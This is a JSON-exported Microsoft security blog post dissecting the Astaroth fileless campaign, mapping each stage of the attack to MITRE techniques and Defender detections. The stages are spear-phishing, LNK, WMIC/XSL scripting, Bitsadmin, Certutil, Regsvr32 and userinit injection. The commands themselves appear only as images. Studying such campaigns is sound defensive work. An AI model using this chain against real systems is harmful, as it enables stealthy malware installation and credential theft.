{"id":89592,"date":"2019-07-08T09:00:51","date_gmt":"2019-07-08T16:00:51","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/?p=89592"},"modified":"2025-12-21T14:06:33","modified_gmt":"2025-12-21T22:06:33","slug":"dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","title":{"rendered":"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth attack"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">The prevailing perception about fileless threats, among the security industry\u2019s biggest areas of concern today, is that security solutions are helpless against these supposedly invincible threats. Because fileless attacks run the payload directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk, they present challenges to traditional file-based solutions.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">But let\u2019s set the record straight: being fileless doesn\u2019t mean being invisible; it certainly doesn\u2019t mean being undetectable. There\u2019s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (<a href=\"https:\/\/www.microsoft.com\/en-us\/WindowsForBusiness\/windows-atp\">Microsoft Defender ATP<\/a>) can detect and stop.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To help disambiguate the term fileless, we developed a <a href=\"https:\/\/docs.microsoft.com\/windows\/security\/threat-protection\/intelligence\/fileless-threats\">comprehensive definition for fileless malware<\/a> as reference for understanding the wide range of fileless threats. We have also discussed at length the <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2018\/09\/27\/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av\/\">advanced capabilities in Microsoft Defender ATP that counter fileless techniques<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">I recently unearthed a widespread fileless campaign called <a href=\"https:\/\/attack.mitre.org\/software\/S0373\/\">Astaroth<\/a> that completely \u201clived off the land\u201d: it only ran system tools throughout a complex attack chain. The attack involved multiple steps that use various fileless techniques and proved a great real-world benchmark for Microsoft Defender ATP\u2019s capabilities against fileless threats.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In this blog, I will share my analysis of a fileless attack chain that demonstrates:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Attackers would go to great lengths to avoid detection<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Advanced technologies in Microsoft Defender ATP&#8217;s <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/06\/24\/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection\/\">Antivirus<\/a> expose and defeat fileless attacks<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"exposing-a-fileless-info-stealing-campaign-with-microsoft-defender-atp-s-antivirus\">Exposing a fileless info-stealing campaign with Microsoft Defender ATP&#8217;s Antivirus<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">I was doing routine review of Windows Defender Antivirus telemetry when I noticed an anomaly from a detection algorithm designed to catch a specific fileless technique. Telemetry showed a sharp increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script (a technique that MITRE refers to <a href=\"https:\/\/attack.mitre.org\/techniques\/T1220\/\">XSL Script Processing<\/a>), indicating a fileless attack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1127\" height=\"377\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks.png\" alt=\"Windows Defender Antivirus telemetry shows a sudden increase in suspicious activity\" class=\"wp-image-89608\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks.png 1127w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks-300x100.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks-768x257.png 768w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks-1024x343.png 1024w\" sizes=\"auto, (max-width: 1127px) 100vw, 1127px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 1. Windows Defender Antivirus telemetry shows a sudden increase in suspicious activity<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">After some hunting, I discovered the campaign that aimed to run the <a href=\"https:\/\/attack.mitre.org\/software\/S0373\/\">Astaroth<\/a> backdoor directly in memory. Astaroth is a notorious info-stealing malware known for stealing sensitive information like credentials, keystrokes, and other data, which it exfiltrates and sends to a remote attacker. The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">While the behavior may slightly vary in some instances, the attack generally followed these steps: A malicious link in a spear-phishing email leads to an LNK file. When double-clicked, the LNK file causes the execution of the WMIC tool with the \u201c\/Format\u201d parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1597\" height=\"1324\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain.png\" alt=\"Astaroth \u201cliving-off-the-land\u201d attack chain showing multiple legitimate tools abused\" class=\"wp-image-89595\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain.png 1597w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain-300x249.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain-768x637.png 768w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain-1024x849.png 1024w\" sizes=\"auto, (max-width: 1597px) 100vw, 1597px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 2. Astaroth \u201cliving-off-the-land\u201d attack chain showing multiple legitimate tools abused<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It\u2019s interesting to note that at no point during the attack chain is any file run that\u2019s not a system tool. This technique is called <a href=\"https:\/\/github.com\/LOLBAS-Project\/LOLBAS\/blob\/master\/README.md\">living off the land<\/a>: using legitimate tools that are already present on the target system to masquerade as regular activity.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The attack chain above shows only the <a href=\"https:\/\/attack.mitre.org\/tactics\/TA0001\/\">Initial Access<\/a> and <a href=\"https:\/\/attack.mitre.org\/tactics\/TA0001\/\">Execution<\/a> stages. In these stages, the attackers used fileless techniques to attempt to silently install the malware on target devices. Astaroth is a notorious information stealer with many other post-breach capabilities that are not discussed in this blog. Preventing the attack in these stages is critical.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Despite its use of \u201cinvisible\u201d techniques, the attack chain runs under the scrutiny of Microsoft Defender ATP. <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/06\/24\/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection\/\">Multiple advanced technologies at the core of Windows Defender Antivirus<\/a> expose these techniques to spot and stop a wide range of attacks.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">These protection technologies stop threats at first sight, use the power of the cloud, and leverage Microsoft\u2019s industry-leading optics to deliver effective protection. This defense-in-depth is observed in the way these technologies uncovered and blocked the attack at multiple points in Astaroth\u2019s complex attack chain.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1597\" height=\"1324\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection.png\" alt=\"Microsoft Defender ATP's Antivirus solutions for fileless techniques used by Astaroth\" class=\"wp-image-89596\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection.png 1597w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection-300x249.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection-768x637.png 768w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection-1024x849.png 1024w\" sizes=\"auto, (max-width: 1597px) 100vw, 1597px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 3. Microsoft Defender ATP&#8217;s Antivirus solutions for fileless techniques used by Astaroth<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded\u2014after all, every executable used in the attack is non-malicious. If this were the case, this attack would pose a serious problem: since the DLLs use code obfuscation and are likely to change very rapidly between campaigns, focusing on these DLLs would be a vicious trap.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">However, as mentioned, Microsoft Defender ATP&#8217;s Antivirus catches fileless techniques. Let\u2019s break down the attack steps, enumerate the techniques used using <a href=\"https:\/\/attack.mitre.org\/techniques\/pre\/\">MITRE technique ID<\/a> as reference, and map the relevant Microsoft Defender ATP protection.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-1-arrival\">Step 1: Arrival<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The victim receives an email with a malicious URL:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"34\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/1-URL.png\" alt=\"screenshot\" class=\"wp-image-89597\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/1-URL.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/1-URL-300x12.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/1-URL-768x31.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The URL uses misleading names like <em>certidao.htm<\/em> (Portuguese for \u201ccertificate\u201d), <em>abrir_documento.htm<\/em> (\u201copen document\u201d), <em>pedido.htm<\/em> (\u201corder\u201d), etc.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When clicked, the malicious link redirects the victim to the ZIP archive <em>certidao.htm.zip<\/em>, which contains a similarly misleading named LNK file <em>certidao.htm.lnk<\/em>. When clicked, the LNK file runs an obfuscated BAT command-line.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed<em>:<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1192\/\">T1192<\/a> \u2013 Spearphishing Link<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1023\/\">T1023<\/a> \u2013 Shortcut Modification<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Command-line scanning<\/strong>: Trojan:Win32\/BadEcho.A<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Heuristics engine<\/strong>: Trojan:Win32\/Linkommer.A<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Windows Defender SmartScreen<\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-2-wmic-abuse-part-1\">Step 2: WMIC abuse, part 1<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The BAT command runs the system tool <em>WMIC.exe<\/em>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"54\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/2-wmic.png\" alt=\"screenshot\" class=\"wp-image-89598\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/2-wmic.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/2-wmic-300x20.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/2-wmic-768x50.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The use of the parameter <em>\/format<\/em> causes WMIC to download the file <em>v.txt<\/em>, which is an XSL file hosted on a legitimate-looking domain. The XSL file hosts an obfuscated JavaScript that is automatically run by WMIC. This JavaScript code simply runs WMIC again.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1047\/\">T1047<\/a> \u2013 Windows Management Instrumentation<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1220\/\">T1220<\/a> \u2013 XSL Script Processing<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1064\/\">T1064<\/a> \u2013 Scripting<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/\">T1027<\/a> \u2013 Obfuscated Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmiFormatXslScripting<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>AMSI integration engine<\/strong>: Trojan:JS\/CovertXslDownload.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-3-wmic-abuse-part-2\">Step 3: WMIC abuse, part 2<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">WMIC is run in a fashion similar to the previous step:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"54\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/3-wmic.png\" alt=\"screenshot\" class=\"wp-image-89599\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/3-wmic.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/3-wmic-300x20.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/3-wmic-768x50.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">WMIC downloads <em>vv.txt<\/em>, another XSL file containing an obfuscated JavaScript code, which uses the Bitsadmin, Certutil, and Regsvr32 tools for the next steps.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1047\/\">T1047<\/a> \u2013 Windows Management Instrumentation<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1220\/\">T1220<\/a> \u2013 XSL Script Processing<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1064\/\">T1064<\/a> \u2013 Scripting<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/\">T1027<\/a> \u2013 Obfuscated Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmiFormatXslScripting<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmicLoadDll.A<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>AMSI integration engine<\/strong>: Trojan:JS\/CovertBitsDownload.C<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-4-bitsadmin-abuse\">Step 4: Bitsadmin abuse<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Multiple instances of Bitsadmin are run to download additional payloads:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"74\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/4-bitsadmin.png\" alt=\"screenshot\" class=\"wp-image-89600\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/4-bitsadmin.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/4-bitsadmin-300x27.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/4-bitsadmin-768x68.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The payloads are <a href=\"https:\/\/en.wikipedia.org\/wiki\/Base64\">Base64-encoded<\/a> and have file names like: <em>falxconxrenwb.~<\/em>, <em>falxconxrenw64.~<\/em>, <em>falxconxrenwxa.~<\/em>, <em>falxconxrenwxb.~<\/em>, <em>falxconxrenw98.~<\/em>, <em>falxconxrenwgx.gif<\/em>, <em>falxfonxrenwg.gif<\/em>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1197\/\">T1197<\/a> \u2013 BITS Jobs<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1105\/\">T1105<\/a> \u2013 Remote File Copy<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmicBits.A<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-5-certutil-abuse\">Step 5: Certutil abuse<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The Certutil system tool is used to decode the downloaded payloads:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"54\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/5-certutil.png\" alt=\"screenshot\" class=\"wp-image-89601\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/5-certutil.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/5-certutil-300x20.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/5-certutil-768x50.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Only a couple of files are decoded to a DLL; most are still encrypted\/obfuscated.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE technique observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1140\/\">T1140<\/a> &#8211; Deobfuscate\/Decode Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmiCertutil.A<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-6-regsvr32-abuse\">Step 6: Regsvr32 abuse<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">One of the decoded payload files (a DLL) is run within the contexct of the Regsvr32 system tool:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"34\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/6-regsvr2.png\" alt=\"screenshot\" class=\"wp-image-89602\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/6-regsvr2.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/6-regsvr2-300x12.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/6-regsvr2-768x31.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The file <em>falxconxrenw64.~<\/em> is a proxy: it loads and runs a second DLL, <em>falxconxrenw98.~<\/em>, and passes it to a third DLL that is obtained by reading files <em>falxconxrenwxa.~<\/em> and <em>falxconxrenwxb.~<\/em>. The DLL <em>falxconxrenw98.~<\/em> then reflectively loads the third DLL.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1117\/\">T1117<\/a> \u2013 Regsvr32<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1129\/\">T1129<\/a> \u2013 Execution Through Module Load<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1140\/\">T1140<\/a> &#8211; Deobfuscate\/Decode Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">&nbsp;<strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/UserinitInject.B<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Attack surface reduction<\/strong>: An attack surface reduction rule detects the loading of a DLL that does not meet the age and prevalence criteria (i.e., a new unknown DLL)<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-7-userinit-abuse\">Step 7: Userinit abuse<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The newly loaded DLL reads and decrypts the file <em>falxconxrenwgx.gif<\/em> into a DLL. It runs the system tool <em>userinit.exe<\/em> into which it injects the decrypted DLL. The file <em>falxconxrenwgx.gif<\/em> is again a proxy that reads, decrypts, and reflectively loads the DLL <em>falxconxrenwg.gif<\/em>. This last DLL is the malicious info stealer known as <a href=\"https:\/\/attack.mitre.org\/software\/S0373\/\">Astaroth<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1117\/\">T1117<\/a> \u2013 Regsvr32<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1129\/\">T1129<\/a> \u2013 Execution Through Module Load<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1140\/\">T1140<\/a> &#8211; Deobfuscate\/Decode Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/Astaroth.A<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Attack surface reduction<\/strong>: An attack surface reduction rule detects the loading of a DLL that does not meet the age and prevalence criteria (i.e., a new unknown DLL)<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"comprehensive-protection-against-fileless-attacks-with-microsoft-threat-protection\">Comprehensive protection against fileless attacks with Microsoft Threat Protection<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The strength of Microsoft Defender ATP&#8217;s Antivirus engines in exposing fileless techniques add to the capabilities of the <a href=\"https:\/\/www.microsoft.com\/en-us\/WindowsForBusiness\/windows-atp\">unified endpoint protection platform<\/a>. Activities related to fileless techniques are reported in Microsoft Defender Security Center as alerts, so security operations teams can further investigate and respond to attacks using endpoint detection and response, advanced hunting, and other capabilities in Microsoft Defender ATP.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img 